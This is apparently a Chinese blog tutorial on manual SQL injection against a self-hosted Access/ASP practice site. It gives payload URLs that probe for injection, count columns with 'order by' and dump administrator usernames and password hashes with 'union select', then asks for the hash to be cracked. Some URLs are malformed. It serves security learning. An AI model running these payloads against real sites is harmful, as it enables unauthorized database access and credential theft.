ASSESS手工注入(附搭建教程)

ASSESS搭建

文章顶部有靶场搭建环境

1.将环境压缩包放入wwwroot更目录下

 2.进入网页访问自己IP就可以访问到自己搭建的靶场了  如下图所示 

 ASSESS手工注入

一.判断注入点

http://172.16.1.49/custom.asp?id=1 and 1=1icon-default.png?t=N7T8http://172.16.1.49/custom.asp?id=1%20and%201=1

页面显示正常

http://172.16.1.49/custom.asp?id=1 and 1=2icon-default.png?t=N7T8http://172.16.1.49/custom.asp?id=1%20and%201=2

页面报错

 二.判断当前数据库的字段文件...其到达5时页面置空,说明语句执行失败,当前数据库的字段仅有4列~

http://custom.asp?id=1 order by 4

http://custom.asp?id=1 order by 5icon-default.png?t=N7T8http://custom.asp?id=1%20order%20by%205

 三.判断回显的字段及猜测表名称...在2与3位置可发现存在字段回显.

四.猜字段名 

http://custom.asp?id=1 union select 1,user_name,password,4 from administratoricon-default.png?t=N7T8http://custom.asp?id=1%20union%20select%201,user_name,password,4%20from%20administrator

五.将获取到的密码解密21232f297a57a5a743894a0e4a801fc3

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值